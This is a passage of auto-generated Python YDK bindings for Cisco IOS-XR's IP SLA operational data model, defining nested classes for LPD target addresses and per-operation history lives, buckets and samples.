"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Lpd.Status.State, self).__init__()
self.yang_name = "state"
self.yang_parent_name = "status"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([("target-address", ("target_address", Ipsla.OperationData.Operations.Operation.Lpd.Status.State.TargetAddress))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('monitor_id', YLeaf(YType.uint32, 'monitor-id')),
('discovery_mode', YLeaf(YType.enumeration, 'discovery-mode')),
('start_time', YLeaf(YType.uint64, 'start-time')),
('return_code', YLeaf(YType.enumeration, 'return-code')),
('completion_time', YLeaf(YType.uint32, 'completion-time')),
('path_count', YLeaf(YType.uint32, 'path-count')),
])
self.monitor_id = None
self.discovery_mode = None
self.start_time = None
self.return_code = None
self.completion_time = None
self.path_count = None
self.target_address = Ipsla.OperationData.Operations.Operation.Lpd.Status.State.TargetAddress()
self.target_address.parent = self
self._children_name_map["target_address"] = "target-address"
self._children_yang_names.add("target-address")
self._segment_path = lambda: "state"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Lpd.Status.State, ['monitor_id', 'discovery_mode', 'start_time', 'return_code', 'completion_time', 'path_count'], name, value)
class TargetAddress(Entity):
"""
Target for LPD
.. attribute:: ipv4_prefix_target
IPv4 prefix target
**type**\: :py:class:`Ipv4PrefixTarget <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Lpd.Status.State.TargetAddress.Ipv4PrefixTarget>`
.. attribute:: tunnel_id_target
Tunnel ID target
**type**\: :py:class:`TunnelIdTarget <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Lpd.Status.State.TargetAddress.TunnelIdTarget>`
.. attribute:: ipv4_pseudowire_target
IPv4 pseudowire target
**type**\: :py:class:`Ipv4PseudowireTarget <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Lpd.Status.State.TargetAddress.Ipv4PseudowireTarget>`
.. attribute:: target_type
TargetType
**type**\: :py:class:`IpslaTargetTypeEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.IpslaTargetTypeEnum>`
.. attribute:: ipv4_address_target
IPv4 address target
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: ipv6_address_target
IPv6 address target
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Lpd.Status.State.TargetAddress, self).__init__()
self.yang_name = "target-address"
self.yang_parent_name = "state"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([("ipv4-prefix-target", ("ipv4_prefix_target", Ipsla.OperationData.Operations.Operation.Lpd.Status.State.TargetAddress.Ipv4PrefixTarget)), ("tunnel-id-target", ("tunnel_id_target", Ipsla.OperationData.Operations.Operation.Lpd.Status.State.TargetAddress.TunnelIdTarget)), ("ipv4-pseudowire-target", ("ipv4_pseudowire_target", Ipsla.OperationData.Operations.Operation.Lpd.Status.State.TargetAddress.Ipv4PseudowireTarget))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('target_type', YLeaf(YType.enumeration, 'target-type')),
('ipv4_address_target', YLeaf(YType.str, 'ipv4-address-target')),
('ipv6_address_target', YLeaf(YType.str, 'ipv6-address-target')),
])
self.target_type = None
self.ipv4_address_target = None
self.ipv6_address_target = None
self.ipv4_prefix_target = Ipsla.OperationData.Operations.Operation.Lpd.Status.State.TargetAddress.Ipv4PrefixTarget()
self.ipv4_prefix_target.parent = self
self._children_name_map["ipv4_prefix_target"] = "ipv4-prefix-target"
self._children_yang_names.add("ipv4-prefix-target")
self.tunnel_id_target = Ipsla.OperationData.Operations.Operation.Lpd.Status.State.TargetAddress.TunnelIdTarget()
self.tunnel_id_target.parent = self
self._children_name_map["tunnel_id_target"] = "tunnel-id-target"
self._children_yang_names.add("tunnel-id-target")
self.ipv4_pseudowire_target = Ipsla.OperationData.Operations.Operation.Lpd.Status.State.TargetAddress.Ipv4PseudowireTarget()
self.ipv4_pseudowire_target.parent = self
self._children_name_map["ipv4_pseudowire_target"] = "ipv4-pseudowire-target"
self._children_yang_names.add("ipv4-pseudowire-target")
self._segment_path = lambda: "target-address"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Lpd.Status.State.TargetAddress, ['target_type', 'ipv4_address_target', 'ipv6_address_target'], name, value)
class Ipv4PrefixTarget(Entity):
"""
IPv4 prefix target
.. attribute:: address
IPv4 address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: mask_length
Mask length
**type**\: int
**range:** 0..255
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Lpd.Status.State.TargetAddress.Ipv4PrefixTarget, self).__init__()
self.yang_name = "ipv4-prefix-target"
self.yang_parent_name = "target-address"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('address', YLeaf(YType.str, 'address')),
('mask_length', YLeaf(YType.uint8, 'mask-length')),
])
self.address = None
self.mask_length = None
self._segment_path = lambda: "ipv4-prefix-target"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Lpd.Status.State.TargetAddress.Ipv4PrefixTarget, ['address', 'mask_length'], name, value)
class TunnelIdTarget(Entity):
"""
Tunnel ID target
.. attribute:: tunnel_id
Tunnel ID
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Lpd.Status.State.TargetAddress.TunnelIdTarget, self).__init__()
self.yang_name = "tunnel-id-target"
self.yang_parent_name = "target-address"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('tunnel_id', YLeaf(YType.uint32, 'tunnel-id')),
])
self.tunnel_id = None
self._segment_path = lambda: "tunnel-id-target"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Lpd.Status.State.TargetAddress.TunnelIdTarget, ['tunnel_id'], name, value)
class Ipv4PseudowireTarget(Entity):
"""
IPv4 pseudowire target
.. attribute:: address
IPv4 address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: virtual_circuit_id
Virtual circuit ID
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Lpd.Status.State.TargetAddress.Ipv4PseudowireTarget, self).__init__()
self.yang_name = "ipv4-pseudowire-target"
self.yang_parent_name = "target-address"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('address', YLeaf(YType.str, 'address')),
('virtual_circuit_id', YLeaf(YType.uint32, 'virtual-circuit-id')),
])
self.address = None
self.virtual_circuit_id = None
self._segment_path = lambda: "ipv4-pseudowire-target"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Lpd.Status.State.TargetAddress.Ipv4PseudowireTarget, ['address', 'virtual_circuit_id'], name, value)
class History(Entity):
"""
Historical data for an operation
.. attribute:: path
Historical data with multiple hops along the path
**type**\: :py:class:`Path <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.History.Path>`
.. attribute:: target
Historical data for the destination node
**type**\: :py:class:`Target <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.History.Target>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.History, self).__init__()
self.yang_name = "history"
self.yang_parent_name = "operation"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([("path", ("path", Ipsla.OperationData.Operations.Operation.History.Path)), ("target", ("target", Ipsla.OperationData.Operations.Operation.History.Target))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict()
self.path = Ipsla.OperationData.Operations.Operation.History.Path()
self.path.parent = self
self._children_name_map["path"] = "path"
self._children_yang_names.add("path")
self.target = Ipsla.OperationData.Operations.Operation.History.Target()
self.target.parent = self
self._children_name_map["target"] = "target"
self._children_yang_names.add("target")
self._segment_path = lambda: "history"
class Path(Entity):
"""
Historical data with multiple hops along the
path
.. attribute:: lifes
Tables of lives for an operation
**type**\: :py:class:`Lifes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.History.Path.Lifes>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.History.Path, self).__init__()
self.yang_name = "path"
self.yang_parent_name = "history"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([("lifes", ("lifes", Ipsla.OperationData.Operations.Operation.History.Path.Lifes))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict()
self.lifes = Ipsla.OperationData.Operations.Operation.History.Path.Lifes()
self.lifes.parent = self
self._children_name_map["lifes"] = "lifes"
self._children_yang_names.add("lifes")
self._segment_path = lambda: "path"
class Lifes(Entity):
"""
Tables of lives for an operation
.. attribute:: life
History data for a particular life of the operation
**type**\: list of :py:class:`Life <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.History.Path.Lifes, self).__init__()
self.yang_name = "lifes"
self.yang_parent_name = "path"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([("life", ("life", Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life))])
self._leafs = OrderedDict()
self.life = YList(self)
self._segment_path = lambda: "lifes"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.History.Path.Lifes, [], name, value)
class Life(Entity):
"""
History data for a particular life of the
operation
.. attribute:: life_index (key)
Life Index
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: buckets
Table of history buckets (samples) for a particular operation
**type**\: :py:class:`Buckets <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life, self).__init__()
self.yang_name = "life"
self.yang_parent_name = "lifes"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['life_index']
self._child_container_classes = OrderedDict([("buckets", ("buckets", Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('life_index', YLeaf(YType.int32, 'life-index')),
])
self.life_index = None
self.buckets = Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets()
self.buckets.parent = self
self._children_name_map["buckets"] = "buckets"
self._children_yang_names.add("buckets")
self._segment_path = lambda: "life" + "[life-index='" + str(self.life_index) + "']"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life, ['life_index'], name, value)
class Buckets(Entity):
"""
Table of history buckets (samples) for a
particular operation
.. attribute:: bucket
History bucket for an operation
**type**\: list of :py:class:`Bucket <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets, self).__init__()
self.yang_name = "buckets"
self.yang_parent_name = "life"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([("bucket", ("bucket", Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket))])
self._leafs = OrderedDict()
self.bucket = YList(self)
self._segment_path = lambda: "buckets"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets, [], name, value)
class Bucket(Entity):
"""
History bucket for an operation
.. attribute:: bucket_index (key)
Bucket Index
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: samples
Table of samples for a particular cycle
**type**\: :py:class:`Samples <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket, self).__init__()
self.yang_name = "bucket"
self.yang_parent_name = "buckets"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['bucket_index']
self._child_container_classes = OrderedDict([("samples", ("samples", Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('bucket_index', YLeaf(YType.int32, 'bucket-index')),
])
self.bucket_index = None
self.samples = Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples()
self.samples.parent = self
self._children_name_map["samples"] = "samples"
self._children_yang_names.add("samples")
self._segment_path = lambda: "bucket" + "[bucket-index='" + str(self.bucket_index) + "']"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket, ['bucket_index'], name, value)
class Samples(Entity):
"""
Table of samples for a particular cycle
.. attribute:: sample
Data sample for particular cycle
**type**\: list of :py:class:`Sample <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples, self).__init__()
self.yang_name = "samples"
self.yang_parent_name = "bucket"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([("sample", ("sample", Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample))])
self._leafs = OrderedDict()
self.sample = YList(self)
self._segment_path = lambda: "samples"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples, [], name, value)
class Sample(Entity):
"""
Data sample for particular cycle
.. attribute:: sample_index (key)
Sample Index
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: target_address
Target for the operation
**type**\: :py:class:`TargetAddress <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample.TargetAddress>`
.. attribute:: start_time
Sample Start Time expressed in msec since00\:00 \:00 UTC, January 1, 1970
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: response_time
Round Trip Time (milliseconds)
**type**\: int
**range:** 0..4294967295
**units**\: millisecond
.. attribute:: return_code
Response Return Code
**type**\: :py:class:`IpslaRetCode <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.IpslaRetCode>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample, self).__init__()
self.yang_name = "sample"
self.yang_parent_name = "samples"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['sample_index']
self._child_container_classes = OrderedDict([("target-address", ("target_address", Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample.TargetAddress))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('sample_index', YLeaf(YType.int32, 'sample-index')),
('start_time', YLeaf(YType.uint64, 'start-time')),
('response_time', YLeaf(YType.uint32, 'response-time')),
('return_code', YLeaf(YType.enumeration, 'return-code')),
])
self.sample_index = None
self.start_time = None
self.response_time = None
self.return_code = None
self.target_address = Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample.TargetAddress()
self.target_address.parent = self
self._children_name_map["target_address"] = "target-address"
self._children_yang_names.add("target-address")
self._segment_path = lambda: "sample" + "[sample-index='" + str(self.sample_index) + "']"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample, ['sample_index', 'start_time', 'response_time', 'return_code'], name, value)
class TargetAddress(Entity):
"""
Target for the operation
.. attribute:: ipv4_prefix_target
IPv4 prefix target
**type**\: :py:class:`Ipv4PrefixTarget <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample.TargetAddress.Ipv4PrefixTarget>`
.. attribute:: tunnel_id_target
Tunnel ID target
**type**\: :py:class:`TunnelIdTarget <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample.TargetAddress.TunnelIdTarget>`
.. attribute:: ipv4_pseudowire_target
IPv4 pseudowire target
**type**\: :py:class:`Ipv4PseudowireTarget <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample.TargetAddress.Ipv4PseudowireTarget>`
.. attribute:: target_type
TargetType
**type**\: :py:class:`IpslaTargetTypeEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.IpslaTargetTypeEnum>`
.. attribute:: ipv4_address_target
IPv4 address target
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: ipv6_address_target
IPv6 address target
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample.TargetAddress, self).__init__()
self.yang_name = "target-address"
self.yang_parent_name = "sample"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([("ipv4-prefix-target", ("ipv4_prefix_target", Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample.TargetAddress.Ipv4PrefixTarget)), ("tunnel-id-target", ("tunnel_id_target", Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample.TargetAddress.TunnelIdTarget)), ("ipv4-pseudowire-target", ("ipv4_pseudowire_target", Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample.TargetAddress.Ipv4PseudowireTarget))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('target_type', YLeaf(YType.enumeration, 'target-type')),
('ipv4_address_target', YLeaf(YType.str, 'ipv4-address-target')),
('ipv6_address_target', YLeaf(YType.str, 'ipv6-address-target')),
])
self.target_type = None
self.ipv4_address_target = None
self.ipv6_address_target = None
self.ipv4_prefix_target = Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample.TargetAddress.Ipv4PrefixTarget()
self.ipv4_prefix_target.parent = self
self._children_name_map["ipv4_prefix_target"] = "ipv4-prefix-target"
self._children_yang_names.add("ipv4-prefix-target")
self.tunnel_id_target = Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample.TargetAddress.TunnelIdTarget()
self.tunnel_id_target.parent = self
self._children_name_map["tunnel_id_target"] = "tunnel-id-target"
self._children_yang_names.add("tunnel-id-target")
self.ipv4_pseudowire_target = Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample.TargetAddress.Ipv4PseudowireTarget()
self.ipv4_pseudowire_target.parent = self
self._children_name_map["ipv4_pseudowire_target"] = "ipv4-pseudowire-target"
self._children_yang_names.add("ipv4-pseudowire-target")
self._segment_path = lambda: "target-address"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample.TargetAddress, ['target_type', 'ipv4_address_target', 'ipv6_address_target'], name, value)
class Ipv4PrefixTarget(Entity):
"""
IPv4 prefix target
.. attribute:: address
IPv4 address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: mask_length
Mask length
**type**\: int
**range:** 0..255
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample.TargetAddress.Ipv4PrefixTarget, self).__init__()
self.yang_name = "ipv4-prefix-target"
self.yang_parent_name = "target-address"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('address', YLeaf(YType.str, 'address')),
('mask_length', YLeaf(YType.uint8, 'mask-length')),
])
self.address = None
self.mask_length = None
self._segment_path = lambda: "ipv4-prefix-target"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample.TargetAddress.Ipv4PrefixTarget, ['address', 'mask_length'], name, value)
class TunnelIdTarget(Entity):
"""
Tunnel ID target
.. attribute:: tunnel_id
Tunnel ID
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample.TargetAddress.TunnelIdTarget, self).__init__()
self.yang_name = "tunnel-id-target"
self.yang_parent_name = "target-address"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('tunnel_id', YLeaf(YType.uint32, 'tunnel-id')),
])
self.tunnel_id = None
self._segment_path = lambda: "tunnel-id-target"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample.TargetAddress.TunnelIdTarget, ['tunnel_id'], name, value)
class Ipv4PseudowireTarget(Entity):
"""
IPv4 pseudowire target
.. attribute:: address
IPv4 address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: virtual_circuit_id
Virtual circuit ID
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample.TargetAddress.Ipv4PseudowireTarget, self).__init__()
self.yang_name = "ipv4-pseudowire-target"
self.yang_parent_name = "target-address"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('address', YLeaf(YType.str, 'address')),
('virtual_circuit_id', YLeaf(YType.uint32, 'virtual-circuit-id')),
])
self.address = None
self.virtual_circuit_id = None
self._segment_path = lambda: "ipv4-pseudowire-target"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample.TargetAddress.Ipv4PseudowireTarget, ['address', 'virtual_circuit_id'], name, value)
class Target(Entity):
"""
Historical data for the destination node
.. attribute:: lifes
Tables of lives for an operation
**type**\: :py:class:`Lifes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.History.Target.Lifes>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.History.Target, self).__init__()
self.yang_name = "target"
self.yang_parent_name = "history"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([("lifes", ("lifes", Ipsla.OperationData.Operations.Operation.History.Target.Lifes))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict()
self.lifes = Ipsla.OperationData.Operations.Operation.History.Target.Lifes()
self.lifes.parent = self
self._children_name_map["lifes"] = "lifes"
self._children_yang_names.add("lifes")
self._segment_path = lambda: "target"
class Lifes(Entity):
"""
Tables of lives for an operation
.. attribute:: life
Operational data for a particular life of the operation
**type**\: list of :py:class:`Life <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.History.Target.Lifes, self).__init__()
self.yang_name = "lifes"
self.yang_parent_name = "target"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([("life", ("life", Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life))])
self._leafs = OrderedDict()
self.life = YList(self)
self._segment_path = lambda: "lifes"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.History.Target.Lifes, [], name, value)
class Life(Entity):
"""
Operational data for a particular life of
the operation
.. attribute:: life_index (key)
Life Index
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: buckets
Table of history buckets (samples) for a particular operation
**type**\: :py:class:`Buckets <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life, self).__init__()
self.yang_name = "life"
self.yang_parent_name = "lifes"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['life_index']
self._child_container_classes = OrderedDict([("buckets", ("buckets", Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets))])
self._child_list_classes = OrderedDict([])
